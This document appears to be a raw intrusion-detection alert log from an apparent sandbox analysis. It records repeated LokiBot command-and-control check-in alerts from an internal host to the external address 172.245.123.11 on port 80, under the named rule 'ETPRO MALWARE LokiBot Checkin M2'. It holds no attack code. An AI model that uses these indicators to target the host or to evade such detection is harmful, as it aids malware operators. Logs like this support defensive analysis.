2025-01-07T11:02:06.454475+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49720	172.245.123.11	80	TCP
2025-01-07T11:02:07.167908+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49721	172.245.123.11	80	TCP
2025-01-07T11:02:07.855998+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49722	172.245.123.11	80	TCP
2025-01-07T11:02:08.543768+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49723	172.245.123.11	80	TCP
2025-01-07T11:02:09.203966+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49724	172.245.123.11	80	TCP
2025-01-07T11:02:09.860003+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49725	172.245.123.11	80	TCP
2025-01-07T11:02:10.546688+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49727	172.245.123.11	80	TCP
2025-01-07T11:02:11.233719+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49730	172.245.123.11	80	TCP
2025-01-07T11:02:11.958150+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49732	172.245.123.11	80	TCP
2025-01-07T11:02:12.617821+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49734	172.245.123.11	80	TCP
2025-01-07T11:02:13.258855+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49736	172.245.123.11	80	TCP
2025-01-07T11:02:13.915720+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49738	172.245.123.11	80	TCP
2025-01-07T11:02:14.575614+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49739	172.245.123.11	80	TCP
2025-01-07T11:02:15.241631+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49740	172.245.123.11	80	TCP
2025-01-07T11:02:15.898264+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49741	172.245.123.11	80	TCP
2025-01-07T11:02:16.561248+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49742	172.245.123.11	80	TCP
2025-01-07T11:02:17.278413+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49748	172.245.123.11	80	TCP
2025-01-07T11:02:17.961173+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49754	172.245.123.11	80	TCP
2025-01-07T11:02:18.640081+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49760	172.245.123.11	80	TCP
2025-01-07T11:02:19.327075+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49766	172.245.123.11	80	TCP
2025-01-07T11:02:20.043059+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49772	172.245.123.11	80	TCP
2025-01-07T11:02:20.742103+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49778	172.245.123.11	80	TCP
2025-01-07T11:02:21.431219+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49784	172.245.123.11	80	TCP
2025-01-07T11:02:22.122622+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49790	172.245.123.11	80	TCP
2025-01-07T11:02:22.801706+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49795	172.245.123.11	80	TCP
2025-01-07T11:02:23.524470+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49801	172.245.123.11	80	TCP
2025-01-07T11:02:24.248034+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49804	172.245.123.11	80	TCP
2025-01-07T11:02:24.981285+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49810	172.245.123.11	80	TCP
2025-01-07T11:02:25.670616+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49815	172.245.123.11	80	TCP
2025-01-07T11:02:26.424356+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49821	172.245.123.11	80	TCP
2025-01-07T11:02:27.144150+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49828	172.245.123.11	80	TCP
2025-01-07T11:02:27.947960+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49834	172.245.123.11	80	TCP
2025-01-07T11:02:28.637968+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49839	172.245.123.11	80	TCP
2025-01-07T11:02:29.308443+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49843	172.245.123.11	80	TCP
2025-01-07T11:02:30.085557+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49849	172.245.123.11	80	TCP
2025-01-07T11:02:30.768828+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49854	172.245.123.11	80	TCP
2025-01-07T11:02:31.465790+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49860	172.245.123.11	80	TCP
2025-01-07T11:02:32.162958+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49865	172.245.123.11	80	TCP
2025-01-07T11:02:33.125642+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49872	172.245.123.11	80	TCP
2025-01-07T11:02:33.779104+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49877	172.245.123.11	80	TCP
2025-01-07T11:02:34.503792+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49883	172.245.123.11	80	TCP
2025-01-07T11:02:35.152174+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49889	172.245.123.11	80	TCP
2025-01-07T11:02:35.829436+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49895	172.245.123.11	80	TCP
2025-01-07T11:02:36.478731+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49901	172.245.123.11	80	TCP
2025-01-07T11:02:37.135567+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49907	172.245.123.11	80	TCP
2025-01-07T11:02:37.908206+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49912	172.245.123.11	80	TCP
2025-01-07T11:02:38.589708+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49915	172.245.123.11	80	TCP
2025-01-07T11:02:39.258110+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49920	172.245.123.11	80	TCP
2025-01-07T11:02:39.972590+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49926	172.245.123.11	80	TCP
2025-01-07T11:02:40.635703+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49932	172.245.123.11	80	TCP
2025-01-07T11:02:41.303821+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49934	172.245.123.11	80	TCP
2025-01-07T11:02:41.967237+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49940	172.245.123.11	80	TCP
2025-01-07T11:02:42.625053+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49946	172.245.123.11	80	TCP
2025-01-07T11:02:43.363394+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49952	172.245.123.11	80	TCP
2025-01-07T11:02:44.019633+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49958	172.245.123.11	80	TCP
2025-01-07T11:02:44.684154+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49964	172.245.123.11	80	TCP
2025-01-07T11:02:45.507465+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49969	172.245.123.11	80	TCP
2025-01-07T11:02:46.180115+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49971	172.245.123.11	80	TCP
2025-01-07T11:02:46.851221+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49976	172.245.123.11	80	TCP
2025-01-07T11:02:47.795111+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49982	172.245.123.11	80	TCP
2025-01-07T11:02:48.451009+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49987	172.245.123.11	80	TCP
2025-01-07T11:02:49.150118+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49994	172.245.123.11	80	TCP
2025-01-07T11:02:49.806913+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50000	172.245.123.11	80	TCP
2025-01-07T11:02:50.480746+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50006	172.245.123.11	80	TCP
2025-01-07T11:02:51.210960+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50009	172.245.123.11	80	TCP
2025-01-07T11:02:51.916359+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50015	172.245.123.11	80	TCP
2025-01-07T11:02:52.618644+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50020	172.245.123.11	80	TCP
2025-01-07T11:02:53.273172+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50026	172.245.123.11	80	TCP
2025-01-07T11:02:53.936803+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50032	172.245.123.11	80	TCP
2025-01-07T11:02:55.171759+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50038	172.245.123.11	80	TCP
2025-01-07T11:02:55.829665+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50044	172.245.123.11	80	TCP
2025-01-07T11:02:56.557892+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50050	172.245.123.11	80	TCP
2025-01-07T11:02:57.234366+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50055	172.245.123.11	80	TCP
2025-01-07T11:02:57.904891+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50061	172.245.123.11	80	TCP
2025-01-07T11:02:58.574189+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50066	172.245.123.11	80	TCP
2025-01-07T11:02:59.229112+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50067	172.245.123.11	80	TCP
2025-01-07T11:02:59.900572+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50068	172.245.123.11	80	TCP
2025-01-07T11:03:00.558517+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50069	172.245.123.11	80	TCP
2025-01-07T11:03:01.212085+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50070	172.245.123.11	80	TCP
2025-01-07T11:03:01.900649+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50071	172.245.123.11	80	TCP
2025-01-07T11:03:02.675531+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50072	172.245.123.11	80	TCP
2025-01-07T11:03:03.337291+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50073	172.245.123.11	80	TCP
2025-01-07T11:03:04.013533+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50074	172.245.123.11	80	TCP
2025-01-07T11:03:04.679878+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50075	172.245.123.11	80	TCP
2025-01-07T11:03:05.319446+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50076	172.245.123.11	80	TCP
2025-01-07T11:03:05.975970+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50077	172.245.123.11	80	TCP
2025-01-07T11:03:06.639844+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50078	172.245.123.11	80	TCP
2025-01-07T11:03:07.327650+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50079	172.245.123.11	80	TCP
2025-01-07T11:03:08.132275+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50080	172.245.123.11	80	TCP
2025-01-07T11:03:08.806380+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50081	172.245.123.11	80	TCP
2025-01-07T11:03:09.459976+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50082	172.245.123.11	80	TCP
2025-01-07T11:03:10.132210+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50083	172.245.123.11	80	TCP
2025-01-07T11:03:10.788630+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50084	172.245.123.11	80	TCP
2025-01-07T11:03:11.460089+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50085	172.245.123.11	80	TCP
2025-01-07T11:03:12.127099+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50086	172.245.123.11	80	TCP
2025-01-07T11:03:12.756187+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50087	172.245.123.11	80	TCP
2025-01-07T11:03:13.399253+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50088	172.245.123.11	80	TCP
2025-01-07T11:03:14.117177+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50089	172.245.123.11	80	TCP
2025-01-07T11:03:14.771734+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50090	172.245.123.11	80	TCP
2025-01-07T11:03:15.503726+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50091	172.245.123.11	80	TCP
2025-01-07T11:03:16.146706+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50092	172.245.123.11	80	TCP
2025-01-07T11:03:16.829444+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50093	172.245.123.11	80	TCP
2025-01-07T11:03:17.571531+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50094	172.245.123.11	80	TCP
2025-01-07T11:03:18.224687+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50095	172.245.123.11	80	TCP
2025-01-07T11:03:18.881699+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50096	172.245.123.11	80	TCP
2025-01-07T11:03:19.523285+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50097	172.245.123.11	80	TCP
2025-01-07T11:03:20.196458+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50098	172.245.123.11	80	TCP
2025-01-07T11:03:20.851457+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50099	172.245.123.11	80	TCP
2025-01-07T11:03:21.507813+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50100	172.245.123.11	80	TCP
2025-01-07T11:03:22.176021+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50101	172.245.123.11	80	TCP
2025-01-07T11:03:23.213434+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50102	172.245.123.11	80	TCP
2025-01-07T11:03:24.151005+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50103	172.245.123.11	80	TCP
2025-01-07T11:03:24.824519+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50104	172.245.123.11	80	TCP
2025-01-07T11:03:26.710640+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50105	172.245.123.11	80	TCP
2025-01-07T11:03:27.380300+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50106	172.245.123.11	80	TCP
2025-01-07T11:03:28.015736+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50107	172.245.123.11	80	TCP
2025-01-07T11:03:28.703037+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50108	172.245.123.11	80	TCP
2025-01-07T11:03:29.349451+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50109	172.245.123.11	80	TCP
2025-01-07T11:03:30.026092+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50110	172.245.123.11	80	TCP
2025-01-07T11:03:30.701445+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50111	172.245.123.11	80	TCP
2025-01-07T11:03:31.406580+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50112	172.245.123.11	80	TCP
2025-01-07T11:03:32.067627+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50113	172.245.123.11	80	TCP
2025-01-07T11:03:32.733953+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50114	172.245.123.11	80	TCP
2025-01-07T11:03:33.433270+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50115	172.245.123.11	80	TCP
2025-01-07T11:03:34.782674+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50116	172.245.123.11	80	TCP
2025-01-07T11:03:35.422766+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50117	172.245.123.11	80	TCP
2025-01-07T11:03:36.111250+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50118	172.245.123.11	80	TCP
2025-01-07T11:03:36.787347+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50119	172.245.123.11	80	TCP
2025-01-07T11:03:37.443278+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50120	172.245.123.11	80	TCP
2025-01-07T11:03:38.078880+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50121	172.245.123.11	80	TCP
2025-01-07T11:03:38.720674+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50122	172.245.123.11	80	TCP
2025-01-07T11:03:39.392736+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50123	172.245.123.11	80	TCP
2025-01-07T11:03:40.062714+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50124	172.245.123.11	80	TCP
2025-01-07T11:03:40.725262+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50125	172.245.123.11	80	TCP
2025-01-07T11:03:41.427015+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50126	172.245.123.11	80	TCP
2025-01-07T11:03:42.077854+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50127	172.245.123.11	80	TCP
2025-01-07T11:03:42.718228+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50128	172.245.123.11	80	TCP
2025-01-07T11:03:43.373897+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50129	172.245.123.11	80	TCP
2025-01-07T11:03:44.064476+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50130	172.245.123.11	80	TCP
2025-01-07T11:03:44.703993+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50131	172.245.123.11	80	TCP
2025-01-07T11:03:45.361356+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50132	172.245.123.11	80	TCP
2025-01-07T11:03:46.021356+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50133	172.245.123.11	80	TCP
2025-01-07T11:03:46.728055+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50134	172.245.123.11	80	TCP
2025-01-07T11:03:47.390462+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50135	172.245.123.11	80	TCP
2025-01-07T11:03:48.079188+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50136	172.245.123.11	80	TCP
2025-01-07T11:03:48.750749+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50137	172.245.123.11	80	TCP
2025-01-07T11:03:49.450939+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50138	172.245.123.11	80	TCP
2025-01-07T11:03:50.093929+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50139	172.245.123.11	80	TCP
2025-01-07T11:03:50.740699+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50140	172.245.123.11	80	TCP
2025-01-07T11:03:51.391659+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50141	172.245.123.11	80	TCP
2025-01-07T11:03:52.063134+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50142	172.245.123.11	80	TCP
2025-01-07T11:03:52.739569+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50143	172.245.123.11	80	TCP
2025-01-07T11:03:53.390870+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50144	172.245.123.11	80	TCP
2025-01-07T11:03:54.062572+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50145	172.245.123.11	80	TCP
2025-01-07T11:03:54.718933+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50146	172.245.123.11	80	TCP
2025-01-07T11:03:55.375592+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50147	172.245.123.11	80	TCP
2025-01-07T11:03:56.016359+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50148	172.245.123.11	80	TCP
2025-01-07T11:03:56.672622+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50149	172.245.123.11	80	TCP
2025-01-07T11:03:57.344266+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50150	172.245.123.11	80	TCP
2025-01-07T11:03:58.028337+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50151	172.245.123.11	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T11:01:56.715463+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49704	172.245.123.11	80	TCP
2025-01-07T11:01:57.382609+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49705	172.245.123.11	80	TCP
2025-01-07T11:01:57.943923+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49706	172.245.123.11	80	TCP
2025-01-07T11:01:58.646333+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49708	172.245.123.11	80	TCP
2025-01-07T11:01:59.326148+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49709	172.245.123.11	80	TCP
2025-01-07T11:01:59.975652+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49710	172.245.123.11	80	TCP
2025-01-07T11:02:00.675299+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49711	172.245.123.11	80	TCP
2025-01-07T11:02:01.372775+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49712	172.245.123.11	80	TCP
2025-01-07T11:02:02.102743+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49714	172.245.123.11	80	TCP
2025-01-07T11:02:02.801547+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49715	172.245.123.11	80	TCP
2025-01-07T11:02:03.617744+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49716	172.245.123.11	80	TCP
2025-01-07T11:02:04.247901+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49717	172.245.123.11	80	TCP
2025-01-07T11:02:04.955089+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49718	172.245.123.11	80	TCP
2025-01-07T11:02:05.693265+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49719	172.245.123.11	80	TCP
2025-01-07T11:02:06.454475+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49720	172.245.123.11	80	TCP
2025-01-07T11:02:07.167908+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49721	172.245.123.11	80	TCP
2025-01-07T11:02:07.855998+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49722	172.245.123.11	80	TCP
2025-01-07T11:02:08.543768+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49723	172.245.123.11	80	TCP
2025-01-07T11:02:09.203966+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49724	172.245.123.11	80	TCP
2025-01-07T11:02:09.860003+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49725	172.245.123.11	80	TCP
2025-01-07T11:02:10.546688+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49727	172.245.123.11	80	TCP
2025-01-07T11:02:11.233719+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49730	172.245.123.11	80	TCP
2025-01-07T11:02:11.958150+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49732	172.245.123.11	80	TCP
2025-01-07T11:02:12.617821+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49734	172.245.123.11	80	TCP
2025-01-07T11:02:13.258855+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49736	172.245.123.11	80	TCP
2025-01-07T11:02:13.915720+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49738	172.245.123.11	80	TCP
2025-01-07T11:02:14.575614+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49739	172.245.123.11	80	TCP
2025-01-07T11:02:15.241631+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49740	172.245.123.11	80	TCP
2025-01-07T11:02:15.898264+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49741	172.245.123.11	80	TCP
2025-01-07T11:02:16.561248+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49742	172.245.123.11	80	TCP
2025-01-07T11:02:17.278413+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49748	172.245.123.11	80	TCP
2025-01-07T11:02:17.961173+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49754	172.245.123.11	80	TCP
2025-01-07T11:02:18.640081+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49760	172.245.123.11	80	TCP
2025-01-07T11:02:19.327075+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49766	172.245.123.11	80	TCP
2025-01-07T11:02:20.043059+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49772	172.245.123.11	80	TCP
2025-01-07T11:02:20.742103+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49778	172.245.123.11	80	TCP
2025-01-07T11:02:21.431219+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49784	172.245.123.11	80	TCP
2025-01-07T11:02:22.122622+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49790	172.245.123.11	80	TCP
2025-01-07T11:02:22.801706+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49795	172.245.123.11	80	TCP
2025-01-07T11:02:23.524470+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49801	172.245.123.11	80	TCP
2025-01-07T11:02:24.248034+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49804	172.245.123.11	80	TCP
2025-01-07T11:02:24.981285+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49810	172.245.123.11	80	TCP
2025-01-07T11:02:25.670616+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49815	172.245.123.11	80	TCP
2025-01-07T11:02:26.424356+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49821	172.245.123.11	80	TCP
2025-01-07T11:02:27.144150+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49828	172.245.123.11	80	TCP
2025-01-07T11:02:27.947960+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49834	172.245.123.11	80	TCP
2025-01-07T11:02:28.637968+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49839	172.245.123.11	80	TCP
2025-01-07T11:02:29.308443+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49843	172.245.123.11	80	TCP
2025-01-07T11:02:30.085557+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49849	172.245.123.11	80	TCP
2025-01-07T11:02:30.768828+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49854	172.245.123.11	80	TCP
2025-01-07T11:02:31.465790+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49860	172.245.123.11	80	TCP
2025-01-07T11:02:32.162958+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49865	172.245.123.11	80	TCP
2025-01-07T11:02:33.125642+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49872	172.245.123.11	80	TCP
2025-01-07T11:02:33.779104+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49877	172.245.123.11	80	TCP
2025-01-07T11:02:34.503792+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49883	172.245.123.11	80	TCP
2025-01-07T11:02:35.152174+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49889	172.245.123.11	80	TCP
2025-01-07T11:02:35.829436+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49895	172.245.123.11	80	TCP
2025-01-07T11:02:36.478731+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49901	172.245.123.11	80	TCP
2025-01-07T11:02:37.135567+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49907	172.245.123.11	80	TCP
2025-01-07T11:02:37.908206+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49912	172.245.123.11	80	TCP
2025-01-07T11:02:38.589708+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49915	172.245.123.11	80	TCP
2025-01-07T11:02:39.258110+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49920	172.245.123.11	80	TCP
2025-01-07T11:02:39.972590+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49926	172.245.123.11	80	TCP
2025-01-07T11:02:40.635703+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49932	172.245.123.11	80	TCP
2025-01-07T11:02:41.303821+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49934	172.245.123.11	80	TCP
2025-01-07T11:02:41.967237+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49940	172.245.123.11	80	TCP
2025-01-07T11:02:42.625053+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49946	172.245.123.11	80	TCP
2025-01-07T11:02:43.363394+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49952	172.245.123.11	80	TCP
2025-01-07T11:02:44.019633+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49958	172.245.123.11	80	TCP
2025-01-07T11:02:44.684154+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49964	172.245.123.11	80	TCP
2025-01-07T11:02:45.507465+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49969	172.245.123.11	80	TCP
2025-01-07T11:02:46.180115+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49971	172.245.123.11	80	TCP
2025-01-07T11:02:46.851221+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49976	172.245.123.11	80	TCP
2025-01-07T11:02:47.795111+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49982	172.245.123.11	80	TCP
2025-01-07T11:02:48.451009+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49987	172.245.123.11	80	TCP
2025-01-07T11:02:49.150118+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49994	172.245.123.11	80	TCP
2025-01-07T11:02:49.806913+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50000	172.245.123.11	80	TCP
2025-01-07T11:02:50.480746+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50006	172.245.123.11	80	TCP
2025-01-07T11:02:51.210960+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50009	172.245.123.11	80	TCP
